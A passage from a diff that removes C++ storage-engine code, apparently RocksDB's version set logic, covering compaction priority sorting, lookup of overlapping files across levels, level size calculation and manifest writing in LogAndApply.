-    const std::vector<FileMetaData*>& next_level_files,
-    std::vector<Fsize>* temp) {
-  std::unordered_map<uint64_t, uint64_t> file_to_order;
-  auto next_level_it = next_level_files.begin();
-
-  for (auto& file : files) {
-    uint64_t overlapping_bytes = 0;
-    // Skip files in next level that is smaller than current file
-    while (next_level_it != next_level_files.end() &&
-           icmp.Compare((*next_level_it)->largest, file->smallest) < 0) {
-      next_level_it++;
-    }
-
-    while (next_level_it != next_level_files.end() &&
-           icmp.Compare((*next_level_it)->smallest, file->largest) < 0) {
-      overlapping_bytes += (*next_level_it)->fd.file_size;
-
-      if (icmp.Compare((*next_level_it)->largest, file->largest) > 0) {
-        // next level file cross large boundary of current file.
-        break;
-      }
-      next_level_it++;
-    }
-
-    assert(file->fd.file_size != 0);
-    file_to_order[file->fd.GetNumber()] =
-        overlapping_bytes * 1024u / file->fd.file_size;
-  }
-
-  std::sort(temp->begin(), temp->end(),
-            [&](const Fsize& f1, const Fsize& f2) -> bool {
-              return file_to_order[f1.file->fd.GetNumber()] <
-                     file_to_order[f2.file->fd.GetNumber()];
-            });
-}
-}  // namespace
-
-void VersionStorageInfo::UpdateFilesByCompactionPri(
-    CompactionPri compaction_pri) {
-  if (compaction_style_ == kCompactionStyleFIFO ||
-      compaction_style_ == kCompactionStyleUniversal) {
-    // don't need this
-    return;
-  }
-  // No need to sort the highest level because it is never compacted.
-  for (int level = 0; level < num_levels() - 1; level++) {
-    const std::vector<FileMetaData*>& files = files_[level];
-    auto& files_by_compaction_pri = files_by_compaction_pri_[level];
-    assert(files_by_compaction_pri.size() == 0);
-
-    // populate a temp vector for sorting based on size
-    std::vector<Fsize> temp(files.size());
-    for (size_t i = 0; i < files.size(); i++) {
-      temp[i].index = i;
-      temp[i].file = files[i];
-    }
-
-    // sort the top number_of_files_to_sort_ based on file size
-    size_t num = VersionStorageInfo::kNumberFilesToSort;
-    if (num > temp.size()) {
-      num = temp.size();
-    }
-    switch (compaction_pri) {
-      case kByCompensatedSize:
-        std::partial_sort(temp.begin(), temp.begin() + num, temp.end(),
-                          CompareCompensatedSizeDescending);
-        break;
-      case kOldestLargestSeqFirst:
-        std::sort(temp.begin(), temp.end(),
-                  [](const Fsize& f1, const Fsize& f2) -> bool {
-                    return f1.file->largest_seqno < f2.file->largest_seqno;
-                  });
-        break;
-      case kOldestSmallestSeqFirst:
-        std::sort(temp.begin(), temp.end(),
-                  [](const Fsize& f1, const Fsize& f2) -> bool {
-                    return f1.file->smallest_seqno < f2.file->smallest_seqno;
-                  });
-        break;
-      case kMinOverlappingRatio:
-        SortFileByOverlappingRatio(*internal_comparator_, files_[level],
-                                   files_[level + 1], &temp);
-        break;
-      default:
-        assert(false);
-    }
-    assert(temp.size() == files.size());
-
-    // initialize files_by_compaction_pri_
-    for (size_t i = 0; i < temp.size(); i++) {
-      files_by_compaction_pri.push_back(static_cast<int>(temp[i].index));
-    }
-    next_file_to_compact_by_size_[level] = 0;
-    assert(files_[level].size() == files_by_compaction_pri_[level].size());
-  }
-}
-
-void VersionStorageInfo::GenerateLevel0NonOverlapping() {
-  assert(!finalized_);
-  level0_non_overlapping_ = true;
-  if (level_files_brief_.size() == 0) {
-    return;
-  }
-
-  // A copy of L0 files sorted by smallest key
-  std::vector<FdWithKeyRange> level0_sorted_file(
-      level_files_brief_[0].files,
-      level_files_brief_[0].files + level_files_brief_[0].num_files);
-  std::sort(level0_sorted_file.begin(), level0_sorted_file.end(),
-            [this](const FdWithKeyRange& f1, const FdWithKeyRange& f2) -> bool {
-              return (internal_comparator_->Compare(f1.smallest_key,
-                                                    f2.smallest_key) < 0);
-            });
-
-  for (size_t i = 1; i < level0_sorted_file.size(); ++i) {
-    FdWithKeyRange& f = level0_sorted_file[i];
-    FdWithKeyRange& prev = level0_sorted_file[i - 1];
-    if (internal_comparator_->Compare(prev.largest_key, f.smallest_key) >= 0) {
-      level0_non_overlapping_ = false;
-      break;
-    }
-  }
-}
-
-void Version::Ref() {
-  ++refs_;
-}
-
-bool Version::Unref() {
-  assert(refs_ >= 1);
-  --refs_;
-  if (refs_ == 0) {
-    delete this;
-    return true;
-  }
-  return false;
-}
-
-bool VersionStorageInfo::OverlapInLevel(int level,
-                                        const Slice* smallest_user_key,
-                                        const Slice* largest_user_key) {
-  if (level >= num_non_empty_levels_) {
-    // empty level, no overlap
-    return false;
-  }
-  return SomeFileOverlapsRange(*internal_comparator_, (level > 0),
-                               level_files_brief_[level], smallest_user_key,
-                               largest_user_key);
-}
-
-// Store in "*inputs" all files in "level" that overlap [begin,end]
-// If hint_index is specified, then it points to a file in the
-// overlapping range.
-// The file_index returns a pointer to any file in an overlapping range.
-void VersionStorageInfo::GetOverlappingInputs(
-    int level, const InternalKey* begin, const InternalKey* end,
-    std::vector<FileMetaData*>* inputs, int hint_index, int* file_index,
-    bool expand_range) const {
-  if (level >= num_non_empty_levels_) {
-    // this level is empty, no overlapping inputs
-    return;
-  }
-
-  inputs->clear();
-  Slice user_begin, user_end;
-  if (begin != nullptr) {
-    user_begin = begin->user_key();
-  }
-  if (end != nullptr) {
-    user_end = end->user_key();
-  }
-  if (file_index) {
-    *file_index = -1;
-  }
-  const Comparator* user_cmp = user_comparator_;
-  if (begin != nullptr && end != nullptr && level > 0) {
-    GetOverlappingInputsRangeBinarySearch(level, user_begin, user_end, inputs,
-                                          hint_index, file_index);
-    return;
-  }
-
-  for (size_t i = 0; i < level_files_brief_[level].num_files; ) {
-    FdWithKeyRange* f = &(level_files_brief_[level].files[i++]);
-    const Slice file_start = ExtractUserKey(f->smallest_key);
-    const Slice file_limit = ExtractUserKey(f->largest_key);
-    if (begin != nullptr && user_cmp->Compare(file_limit, user_begin) < 0) {
-      // "f" is completely before specified range; skip it
-    } else if (end != nullptr && user_cmp->Compare(file_start, user_end) > 0) {
-      // "f" is completely after specified range; skip it
-    } else {
-      inputs->push_back(files_[level][i-1]);
-      if (level == 0 && expand_range) {
-        // Level-0 files may overlap each other.  So check if the newly
-        // added file has expanded the range.  If so, restart search.
-        if (begin != nullptr && user_cmp->Compare(file_start, user_begin) < 0) {
-          user_begin = file_start;
-          inputs->clear();
-          i = 0;
-        } else if (end != nullptr
-            && user_cmp->Compare(file_limit, user_end) > 0) {
-          user_end = file_limit;
-          inputs->clear();
-          i = 0;
-        }
-      } else if (file_index) {
-        *file_index = static_cast<int>(i) - 1;
-      }
-    }
-  }
-}
-
-// Store in "*inputs" files in "level" that within range [begin,end]
-// Guarantee a "clean cut" boundary between the files in inputs
-// and the surrounding files and the maxinum number of files.
-// This will ensure that no parts of a key are lost during compaction.
-// If hint_index is specified, then it points to a file in the range.
-// The file_index returns a pointer to any file in an overlapping range.
-void VersionStorageInfo::GetCleanInputsWithinInterval(
-    int level, const InternalKey* begin, const InternalKey* end,
-    std::vector<FileMetaData*>* inputs, int hint_index, int* file_index) const {
-  if (level >= num_non_empty_levels_) {
-    // this level is empty, no inputs within range
-    return;
-  }
-
-  inputs->clear();
-  Slice user_begin, user_end;
-  if (begin != nullptr) {
-    user_begin = begin->user_key();
-  }
-  if (end != nullptr) {
-    user_end = end->user_key();
-  }
-  if (file_index) {
-    *file_index = -1;
-  }
-  if (begin != nullptr && end != nullptr && level > 0) {
-    GetOverlappingInputsRangeBinarySearch(level, user_begin, user_end, inputs,
-                                          hint_index, file_index,
-                                          true /* within_interval */);
-  }
-}
-
-// Store in "*inputs" all files in "level" that overlap [begin,end]
-// Employ binary search to find at least one file that overlaps the
-// specified range. From that file, iterate backwards and
-// forwards to find all overlapping files.
-// if within_range is set, then only store the maximum clean inputs
-// within range [begin, end]. "clean" means there is a boudnary
-// between the files in "*inputs" and the surrounding files
-void VersionStorageInfo::GetOverlappingInputsRangeBinarySearch(
-    int level, const Slice& user_begin, const Slice& user_end,
-    std::vector<FileMetaData*>* inputs, int hint_index, int* file_index,
-    bool within_interval) const {
-  assert(level > 0);
-  int min = 0;
-  int mid = 0;
-  int max = static_cast<int>(files_[level].size()) - 1;
-  bool foundOverlap = false;
-  const Comparator* user_cmp = user_comparator_;
-
-  // if the caller already knows the index of a file that has overlap,
-  // then we can skip the binary search.
-  if (hint_index != -1) {
-    mid = hint_index;
-    foundOverlap = true;
-  }
-
-  while (!foundOverlap && min <= max) {
-    mid = (min + max)/2;
-    FdWithKeyRange* f = &(level_files_brief_[level].files[mid]);
-    const Slice file_start = ExtractUserKey(f->smallest_key);
-    const Slice file_limit = ExtractUserKey(f->largest_key);
-    if ((!within_interval && user_cmp->Compare(file_limit, user_begin) < 0) ||
-        (within_interval && user_cmp->Compare(file_start, user_begin) < 0)) {
-      min = mid + 1;
-    } else if ((!within_interval &&
-                user_cmp->Compare(user_end, file_start) < 0) ||
-               (within_interval &&
-                user_cmp->Compare(user_end, file_limit) < 0)) {
-      max = mid - 1;
-    } else {
-      foundOverlap = true;
-      break;
-    }
-  }
-
-  // If there were no overlapping files, return immediately.
-  if (!foundOverlap) {
-    return;
-  }
-  // returns the index where an overlap is found
-  if (file_index) {
-    *file_index = mid;
-  }
-
-  int start_index, end_index;
-  if (within_interval) {
-    ExtendFileRangeWithinInterval(level, user_begin, user_end, mid, &start_index,
-                                  &end_index);
-  } else {
-    ExtendFileRangeOverlappingInterval(level, user_begin, user_end, mid,
-                                       &start_index, &end_index);
-  }
-  assert(end_index >= start_index);
-  // insert overlapping files into vector
-  for (int i = start_index; i <= end_index; i++) {
-    inputs->push_back(files_[level][i]);
-  }
-}
-
-// Store in *start_index and *end_index the range of all files in
-// "level" that overlap [begin,end]
-// The mid_index specifies the index of at least one file that
-// overlaps the specified range. From that file, iterate backward
-// and forward to find all overlapping files.
-// Use FileLevel in searching, make it faster
-void VersionStorageInfo::ExtendFileRangeOverlappingInterval(
-    int level, const Slice& user_begin, const Slice& user_end,
-    unsigned int mid_index, int* start_index, int* end_index) const {
-  const Comparator* user_cmp = user_comparator_;
-  const FdWithKeyRange* files = level_files_brief_[level].files;
-#ifndef NDEBUG
-  {
-    // assert that the file at mid_index overlaps with the range
-    assert(mid_index < level_files_brief_[level].num_files);
-    const FdWithKeyRange* f = &files[mid_index];
-    const Slice fstart = ExtractUserKey(f->smallest_key);
-    const Slice flimit = ExtractUserKey(f->largest_key);
-    if (user_cmp->Compare(fstart, user_begin) >= 0) {
-      assert(user_cmp->Compare(fstart, user_end) <= 0);
-    } else {
-      assert(user_cmp->Compare(flimit, user_begin) >= 0);
-    }
-  }
-#endif
-  *start_index = mid_index + 1;
-  *end_index = mid_index;
-  int count __attribute__((unused)) = 0;
-
-  // check backwards from 'mid' to lower indices
-  for (int i = mid_index; i >= 0 ; i--) {
-    const FdWithKeyRange* f = &files[i];
-    const Slice file_limit = ExtractUserKey(f->largest_key);
-    if (user_cmp->Compare(file_limit, user_begin) >= 0) {
-      *start_index = i;
-      assert((count++, true));
-    } else {
-      break;
-    }
-  }
-  // check forward from 'mid+1' to higher indices
-  for (unsigned int i = mid_index+1;
-       i < level_files_brief_[level].num_files; i++) {
-    const FdWithKeyRange* f = &files[i];
-    const Slice file_start = ExtractUserKey(f->smallest_key);
-    if (user_cmp->Compare(file_start, user_end) <= 0) {
-      assert((count++, true));
-      *end_index = i;
-    } else {
-      break;
-    }
-  }
-  assert(count == *end_index - *start_index + 1);
-}
-
-// Store in *start_index and *end_index the clean range of all files in
-// "level" within [begin,end]
-// The mid_index specifies the index of at least one file within
-// the specified range. From that file, iterate backward
-// and forward to find all overlapping files and then "shrink" to
-// the clean range required.
-// Use FileLevel in searching, make it faster
-void VersionStorageInfo::ExtendFileRangeWithinInterval(
-    int level, const Slice& user_begin, const Slice& user_end,
-    unsigned int mid_index, int* start_index, int* end_index) const {
-  assert(level != 0);
-  const Comparator* user_cmp = user_comparator_;
-  const FdWithKeyRange* files = level_files_brief_[level].files;
-#ifndef NDEBUG
-  {
-    // assert that the file at mid_index is within the range
-    assert(mid_index < level_files_brief_[level].num_files);
-    const FdWithKeyRange* f = &files[mid_index];
-    const Slice fstart = ExtractUserKey(f->smallest_key);
-    const Slice flimit = ExtractUserKey(f->largest_key);
-    assert(user_cmp->Compare(fstart, user_begin) >= 0 &&
-           user_cmp->Compare(flimit, user_end) <= 0);
-  }
-#endif
-  ExtendFileRangeOverlappingInterval(level, user_begin, user_end, mid_index,
-                                     start_index, end_index);
-  int left = *start_index;
-  int right = *end_index;
-  // shrink from left to right
-  while (left <= right) {
-    const Slice& first_key_in_range = ExtractUserKey(files[left].smallest_key);
-    if (user_cmp->Compare(first_key_in_range, user_begin) < 0) {
-      left++;
-      continue;
-    }
-    if (left > 0) {  // If not first file
-      const Slice& last_key_before =
-          ExtractUserKey(files[left - 1].largest_key);
-      if (user_cmp->Equal(first_key_in_range, last_key_before)) {
-        // The first user key in range overlaps with the previous file's last
-        // key
-        left++;
-        continue;
-      }
-    }
-    break;
-  }
-  // shrink from right to left
-  while (left <= right) {
-    const Slice last_key_in_range = ExtractUserKey(files[right].largest_key);
-    if (user_cmp->Compare(last_key_in_range, user_end) > 0) {
-      right--;
-      continue;
-    }
-    if (right < static_cast<int>(level_files_brief_[level].num_files) -
-                    1) {  // If not the last file
-      const Slice first_key_after =
-          ExtractUserKey(files[right + 1].smallest_key);
-      if (user_cmp->Equal(last_key_in_range, first_key_after)) {
-        // The last user key in range overlaps with the next file's first key
-        right--;
-        continue;
-      }
-    }
-    break;
-  }
-
-  *start_index = left;
-  *end_index = right;
-}
-
-uint64_t VersionStorageInfo::NumLevelBytes(int level) const {
-  assert(level >= 0);
-  assert(level < num_levels());
-  return TotalFileSize(files_[level]);
-}
-
-const char* VersionStorageInfo::LevelSummary(
-    LevelSummaryStorage* scratch) const {
-  int len = 0;
-  if (compaction_style_ == kCompactionStyleLevel && num_levels() > 1) {
-    assert(base_level_ < static_cast<int>(level_max_bytes_.size()));
-    len = snprintf(scratch->buffer, sizeof(scratch->buffer),
-                   "base level %d max bytes base %" PRIu64 " ", base_level_,
-                   level_max_bytes_[base_level_]);
-  }
-  len +=
-      snprintf(scratch->buffer + len, sizeof(scratch->buffer) - len, "files[");
-  for (int i = 0; i < num_levels(); i++) {
-    int sz = sizeof(scratch->buffer) - len;
-    int ret = snprintf(scratch->buffer + len, sz, "%d ", int(files_[i].size()));
-    if (ret < 0 || ret >= sz) break;
-    len += ret;
-  }
-  if (len > 0) {
-    // overwrite the last space
-    --len;
-  }
-  len += snprintf(scratch->buffer + len, sizeof(scratch->buffer) - len,
-                  "] max score %.2f", compaction_score_[0]);
-
-  if (!files_marked_for_compaction_.empty()) {
-    snprintf(scratch->buffer + len, sizeof(scratch->buffer) - len,
-             " (%" ROCKSDB_PRIszt " files need compaction)",
-             files_marked_for_compaction_.size());
-  }
-
-  return scratch->buffer;
-}
-
-const char* VersionStorageInfo::LevelFileSummary(FileSummaryStorage* scratch,
-                                                 int level) const {
-  int len = snprintf(scratch->buffer, sizeof(scratch->buffer), "files_size[");
-  for (const auto& f : files_[level]) {
-    int sz = sizeof(scratch->buffer) - len;
-    char sztxt[16];
-    AppendHumanBytes(f->fd.GetFileSize(), sztxt, sizeof(sztxt));
-    int ret = snprintf(scratch->buffer + len, sz,
-                       "#%" PRIu64 "(seq=%" PRIu64 ",sz=%s,%d) ",
-                       f->fd.GetNumber(), f->smallest_seqno, sztxt,
-                       static_cast<int>(f->being_compacted));
-    if (ret < 0 || ret >= sz)
-      break;
-    len += ret;
-  }
-  // overwrite the last space (only if files_[level].size() is non-zero)
-  if (files_[level].size() && len > 0) {
-    --len;
-  }
-  snprintf(scratch->buffer + len, sizeof(scratch->buffer) - len, "]");
-  return scratch->buffer;
-}
-
-int64_t VersionStorageInfo::MaxNextLevelOverlappingBytes() {
-  uint64_t result = 0;
-  std::vector<FileMetaData*> overlaps;
-  for (int level = 1; level < num_levels() - 1; level++) {
-    for (const auto& f : files_[level]) {
-      GetOverlappingInputs(level + 1, &f->smallest, &f->largest, &overlaps);
-      const uint64_t sum = TotalFileSize(overlaps);
-      if (sum > result) {
-        result = sum;
-      }
-    }
-  }
-  return result;
-}
-
-uint64_t VersionStorageInfo::MaxBytesForLevel(int level) const {
-  // Note: the result for level zero is not really used since we set
-  // the level-0 compaction threshold based on number of files.
-  assert(level >= 0);
-  assert(level < static_cast<int>(level_max_bytes_.size()));
-  return level_max_bytes_[level];
-}
-
-void VersionStorageInfo::CalculateBaseBytes(const ImmutableCFOptions& ioptions,
-                                            const MutableCFOptions& options) {
-  // Special logic to set number of sorted runs.
-  // It is to match the previous behavior when all files are in L0.
-  int num_l0_count = static_cast<int>(files_[0].size());
-  if (compaction_style_ == kCompactionStyleUniversal) {
-    // For universal compaction, we use level0 score to indicate
-    // compaction score for the whole DB. Adding other levels as if
-    // they are L0 files.
-    for (int i = 1; i < num_levels(); i++) {
-      if (!files_[i].empty()) {
-        num_l0_count++;
-      }
-    }
-  }
-  set_l0_delay_trigger_count(num_l0_count);
-
-  level_max_bytes_.resize(ioptions.num_levels);
-  if (!ioptions.level_compaction_dynamic_level_bytes) {
-    base_level_ = (ioptions.compaction_style == kCompactionStyleLevel) ? 1 : -1;
-
-    // Calculate for static bytes base case
-    for (int i = 0; i < ioptions.num_levels; ++i) {
-      if (i == 0 && ioptions.compaction_style == kCompactionStyleUniversal) {
-        level_max_bytes_[i] = options.max_bytes_for_level_base;
-      } else if (i > 1) {
-        level_max_bytes_[i] = MultiplyCheckOverflow(
-            MultiplyCheckOverflow(level_max_bytes_[i - 1],
-                                  options.max_bytes_for_level_multiplier),
-            options.MaxBytesMultiplerAdditional(i - 1));
-      } else {
-        level_max_bytes_[i] = options.max_bytes_for_level_base;
-      }
-    }
-  } else {
-    uint64_t max_level_size = 0;
-
-    int first_non_empty_level = -1;
-    // Find size of non-L0 level of most data.
-    // Cannot use the size of the last level because it can be empty or less
-    // than previous levels after compaction.
-    for (int i = 1; i < num_levels_; i++) {
-      uint64_t total_size = 0;
-      for (const auto& f : files_[i]) {
-        total_size += f->fd.GetFileSize();
-      }
-      if (total_size > 0 && first_non_empty_level == -1) {
-        first_non_empty_level = i;
-      }
-      if (total_size > max_level_size) {
-        max_level_size = total_size;
-      }
-    }
-
-    // Prefill every level's max bytes to disallow compaction from there.
-    for (int i = 0; i < num_levels_; i++) {
-      level_max_bytes_[i] = std::numeric_limits<uint64_t>::max();
-    }
-
-    if (max_level_size == 0) {
-      // No data for L1 and up. L0 compacts to last level directly.
-      // No compaction from L1+ needs to be scheduled.
-      base_level_ = num_levels_ - 1;
-    } else {
-      uint64_t base_bytes_max = options.max_bytes_for_level_base;
-      uint64_t base_bytes_min = static_cast<uint64_t>(
-          base_bytes_max / options.max_bytes_for_level_multiplier);
-
-      // Try whether we can make last level's target size to be max_level_size
-      uint64_t cur_level_size = max_level_size;
-      for (int i = num_levels_ - 2; i >= first_non_empty_level; i--) {
-        // Round up after dividing
-        cur_level_size = static_cast<uint64_t>(
-            cur_level_size / options.max_bytes_for_level_multiplier);
-      }
-
-      // Calculate base level and its size.
-      uint64_t base_level_size;
-      if (cur_level_size <= base_bytes_min) {
-        // Case 1. If we make target size of last level to be max_level_size,
-        // target size of the first non-empty level would be smaller than
-        // base_bytes_min. We set it be base_bytes_min.
-        base_level_size = base_bytes_min + 1U;
-        base_level_ = first_non_empty_level;
-        ROCKS_LOG_WARN(ioptions.info_log,
-                       "More existing levels in DB than needed. "
-                       "max_bytes_for_level_multiplier may not be guaranteed.");
-      } else {
-        // Find base level (where L0 data is compacted to).
-        base_level_ = first_non_empty_level;
-        while (base_level_ > 1 && cur_level_size > base_bytes_max) {
-          --base_level_;
-          cur_level_size = static_cast<uint64_t>(
-              cur_level_size / options.max_bytes_for_level_multiplier);
-        }
-        if (cur_level_size > base_bytes_max) {
-          // Even L1 will be too large
-          assert(base_level_ == 1);
-          base_level_size = base_bytes_max;
-        } else {
-          base_level_size = cur_level_size;
-        }
-      }
-
-      uint64_t level_size = base_level_size;
-      for (int i = base_level_; i < num_levels_; i++) {
-        if (i > base_level_) {
-          level_size = MultiplyCheckOverflow(
-              level_size, options.max_bytes_for_level_multiplier);
-        }
-        // Don't set any level below base_bytes_max. Otherwise, the LSM can
-        // assume an hourglass shape where L1+ sizes are smaller than L0. This
-        // causes compaction scoring, which depends on level sizes, to favor L1+
-        // at the expense of L0, which may fill up and stall.
-        level_max_bytes_[i] = std::max(level_size, base_bytes_max);
-      }
-    }
-  }
-}
-
-uint64_t VersionStorageInfo::EstimateLiveDataSize() const {
-  // Estimate the live data size by adding up the size of the last level for all
-  // key ranges. Note: Estimate depends on the ordering of files in level 0
-  // because files in level 0 can be overlapping.
-  uint64_t size = 0;
-
-  auto ikey_lt = [this](InternalKey* x, InternalKey* y) {
-    return internal_comparator_->Compare(*x, *y) < 0;
-  };
-  // (Ordered) map of largest keys in non-overlapping files
-  std::map<InternalKey*, FileMetaData*, decltype(ikey_lt)> ranges(ikey_lt);
-
-  for (int l = num_levels_ - 1; l >= 0; l--) {
-    bool found_end = false;
-    for (auto file : files_[l]) {
-      // Find the first file where the largest key is larger than the smallest
-      // key of the current file. If this file does not overlap with the
-      // current file, none of the files in the map does. If there is
-      // no potential overlap, we can safely insert the rest of this level
-      // (if the level is not 0) into the map without checking again because
-      // the elements in the level are sorted and non-overlapping.
-      auto lb = (found_end && l != 0) ?
-        ranges.end() : ranges.lower_bound(&file->smallest);
-      found_end = (lb == ranges.end());
-      if (found_end || internal_comparator_->Compare(
-            file->largest, (*lb).second->smallest) < 0) {
-          ranges.emplace_hint(lb, &file->largest, file);
-          size += file->fd.file_size;
-      }
-    }
-  }
-  return size;
-}
-
-
-void Version::AddLiveFiles(std::vector<FileDescriptor>* live) {
-  for (int level = 0; level < storage_info_.num_levels(); level++) {
-    const std::vector<FileMetaData*>& files = storage_info_.files_[level];
-    for (const auto& file : files) {
-      live->push_back(file->fd);
-    }
-  }
-}
-
-std::string Version::DebugString(bool hex, bool print_stats) const {
-  std::string r;
-  for (int level = 0; level < storage_info_.num_levels_; level++) {
-    // E.g.,
-    //   --- level 1 ---
-    //   17:123['a' .. 'd']
-    //   20:43['e' .. 'g']
-    //
-    // if print_stats=true:
-    //   17:123['a' .. 'd'](4096)
-    r.append("--- level ");
-    AppendNumberTo(&r, level);
-    r.append(" --- version# ");
-    AppendNumberTo(&r, version_number_);
-    r.append(" ---\n");
-    const std::vector<FileMetaData*>& files = storage_info_.files_[level];
-    for (size_t i = 0; i < files.size(); i++) {
-      r.push_back(' ');
-      AppendNumberTo(&r, files[i]->fd.GetNumber());
-      r.push_back(':');
-      AppendNumberTo(&r, files[i]->fd.GetFileSize());
-      r.append("[");
-      r.append(files[i]->smallest.DebugString(hex));
-      r.append(" .. ");
-      r.append(files[i]->largest.DebugString(hex));
-      r.append("]");
-      if (print_stats) {
-        r.append("(");
-        r.append(ToString(
-            files[i]->stats.num_reads_sampled.load(std::memory_order_relaxed)));
-        r.append(")");
-      }
-      r.append("\n");
-    }
-  }
-  return r;
-}
-
-// this is used to batch writes to the manifest file
-struct VersionSet::ManifestWriter {
-  Status status;
-  bool done;
-  InstrumentedCondVar cv;
-  ColumnFamilyData* cfd;
-  const autovector<VersionEdit*>& edit_list;
-
-  explicit ManifestWriter(InstrumentedMutex* mu, ColumnFamilyData* _cfd,
-                          const autovector<VersionEdit*>& e)
-      : done(false), cv(mu), cfd(_cfd), edit_list(e) {}
-};
-
-VersionSet::VersionSet(const std::string& dbname,
-                       const ImmutableDBOptions* db_options,
-                       const EnvOptions& storage_options, Cache* table_cache,
-                       WriteBufferManager* write_buffer_manager,
-                       WriteController* write_controller)
-    : column_family_set_(
-          new ColumnFamilySet(dbname, db_options, storage_options, table_cache,
-                              write_buffer_manager, write_controller)),
-      env_(db_options->env),
-      dbname_(dbname),
-      db_options_(db_options),
-      next_file_number_(2),
-      manifest_file_number_(0),  // Filled by Recover()
-      pending_manifest_file_number_(0),
-      last_sequence_(0),
-      last_to_be_written_sequence_(0),
-      prev_log_number_(0),
-      current_version_number_(0),
-      manifest_file_size_(0),
-      env_options_(storage_options),
-      env_options_compactions_(
-          env_->OptimizeForCompactionTableRead(env_options_, *db_options_)) {}
-
-void CloseTables(void* ptr, size_t) {
-  TableReader* table_reader = reinterpret_cast<TableReader*>(ptr);
-  table_reader->Close();
-}
-
-VersionSet::~VersionSet() {
-  // we need to delete column_family_set_ because its destructor depends on
-  // VersionSet
-  Cache* table_cache = column_family_set_->get_table_cache();
-  table_cache->ApplyToAllCacheEntries(&CloseTables, false /* thread_safe */);
-  column_family_set_.reset();
-  for (auto file : obsolete_files_) {
-    if (file->table_reader_handle) {
-      table_cache->Release(file->table_reader_handle);
-      TableCache::Evict(table_cache, file->fd.GetNumber());
-    }
-    delete file;
-  }
-  obsolete_files_.clear();
-}
-
-void VersionSet::AppendVersion(ColumnFamilyData* column_family_data,
-                               Version* v) {
-  // compute new compaction score
-  v->storage_info()->ComputeCompactionScore(
-      *column_family_data->ioptions(),
-      *column_family_data->GetLatestMutableCFOptions());
-
-  // Mark v finalized
-  v->storage_info_.SetFinalized();
-
-  // Make "v" current
-  assert(v->refs_ == 0);
-  Version* current = column_family_data->current();
-  assert(v != current);
-  if (current != nullptr) {
-    assert(current->refs_ > 0);
-    current->Unref();
-  }
-  column_family_data->SetCurrent(v);
-  v->Ref();
-
-  // Append to linked list
-  v->prev_ = column_family_data->dummy_versions()->prev_;
-  v->next_ = column_family_data->dummy_versions();
-  v->prev_->next_ = v;
-  v->next_->prev_ = v;
-}
-
-Status VersionSet::LogAndApply(ColumnFamilyData* column_family_data,
-                               const MutableCFOptions& mutable_cf_options,
-                               const autovector<VersionEdit*>& edit_list,
-                               InstrumentedMutex* mu, Directory* db_directory,
-                               bool new_descriptor_log,
-                               const ColumnFamilyOptions* new_cf_options) {
-  mu->AssertHeld();
-  // num of edits
-  auto num_edits = edit_list.size();
-  if (num_edits == 0) {
-    return Status::OK();
-  } else if (num_edits > 1) {
-#ifndef NDEBUG
-    // no group commits for column family add or drop
-    for (auto& edit : edit_list) {
-      assert(!edit->IsColumnFamilyManipulation());
-    }
-#endif
-  }
-
-  // column_family_data can be nullptr only if this is column_family_add.
-  // in that case, we also need to specify ColumnFamilyOptions
-  if (column_family_data == nullptr) {
-    assert(num_edits == 1);
-    assert(edit_list[0]->is_column_family_add_);
-    assert(new_cf_options != nullptr);
-  }
-
-  // queue our request
-  ManifestWriter w(mu, column_family_data, edit_list);
-  manifest_writers_.push_back(&w);
-  while (!w.done && &w != manifest_writers_.front()) {
-    w.cv.Wait();
-  }
-  if (w.done) {
-    return w.status;
-  }
-  if (column_family_data != nullptr && column_family_data->IsDropped()) {
-    // if column family is dropped by the time we get here, no need to write
-    // anything to the manifest
-    manifest_writers_.pop_front();
-    // Notify new head of write queue
-    if (!manifest_writers_.empty()) {
-      manifest_writers_.front()->cv.Signal();
-    }
-    // we steal this code to also inform about cf-drop
-    return Status::ShutdownInProgress();
-  }
-
-  autovector<VersionEdit*> batch_edits;
-  Version* v = nullptr;
-  std::unique_ptr<BaseReferencedVersionBuilder> builder_guard(nullptr);
-
-  // process all requests in the queue
-  ManifestWriter* last_writer = &w;
-  assert(!manifest_writers_.empty());
-  assert(manifest_writers_.front() == &w);
-  if (w.edit_list.front()->IsColumnFamilyManipulation()) {
-    // no group commits for column family add or drop
-    LogAndApplyCFHelper(w.edit_list.front());
-    batch_edits.push_back(w.edit_list.front());
-  } else {
-    v = new Version(column_family_data, this, current_version_number_++);
-    builder_guard.reset(new BaseReferencedVersionBuilder(column_family_data));
-    auto* builder = builder_guard->version_builder();
-    for (const auto& writer : manifest_writers_) {
-      if (writer->edit_list.front()->IsColumnFamilyManipulation() ||
-          writer->cfd->GetID() != column_family_data->GetID()) {
-        // no group commits for column family add or drop
-        // also, group commits across column families are not supported
-        break;
-      }
-      last_writer = writer;
-      for (const auto& edit : writer->edit_list) {
-        LogAndApplyHelper(column_family_data, builder, v, edit, mu);
-        batch_edits.push_back(edit);
-      }
-    }
-    builder->SaveTo(v->storage_info());
-  }
-
-  // Initialize new descriptor log file if necessary by creating
-  // a temporary file that contains a snapshot of the current version.
-  uint64_t new_manifest_file_size = 0;
-  Status s;
-
-  assert(pending_manifest_file_number_ == 0);
-  if (!descriptor_log_ ||
-      manifest_file_size_ > db_options_->max_manifest_file_size) {
-    pending_manifest_file_number_ = NewFileNumber();
-    batch_edits.back()->SetNextFile(next_file_number_.load());
-    new_descriptor_log = true;
-  } else {
-    pending_manifest_file_number_ = manifest_file_number_;
-  }
-
-  if (new_descriptor_log) {
-    // if we're writing out new snapshot make sure to persist max column family
-    if (column_family_set_->GetMaxColumnFamily() > 0) {
-      w.edit_list.front()->SetMaxColumnFamily(
-          column_family_set_->GetMaxColumnFamily());
-    }
-  }
-
-  // Unlock during expensive operations. New writes cannot get here
-  // because &w is ensuring that all new writes get queued.
-  {
-
-    mu->Unlock();
-
-    TEST_SYNC_POINT("VersionSet::LogAndApply:WriteManifest");
-    if (!w.edit_list.front()->IsColumnFamilyManipulation() &&
-        this->GetColumnFamilySet()->get_table_cache()->GetCapacity() ==
-            TableCache::kInfiniteCapacity) {
-      // unlimited table cache. Pre-load table handle now.
-      // Need to do it out of the mutex.
-      builder_guard->version_builder()->LoadTableHandlers(
-          column_family_data->internal_stats(),
-          column_family_data->ioptions()->optimize_filters_for_hits,
-          true /* prefetch_index_and_filter_in_cache */);
-    }
-
-    // This is fine because everything inside of this block is serialized --
-    // only one thread can be here at the same time
-    if (new_descriptor_log) {
-      // create manifest file
-      ROCKS_LOG_INFO(db_options_->info_log, "Creating manifest %" PRIu64 "\n",
-                     pending_manifest_file_number_);
-      unique_ptr<WritableFile> descriptor_file;
-      EnvOptions opt_env_opts = env_->OptimizeForManifestWrite(env_options_);
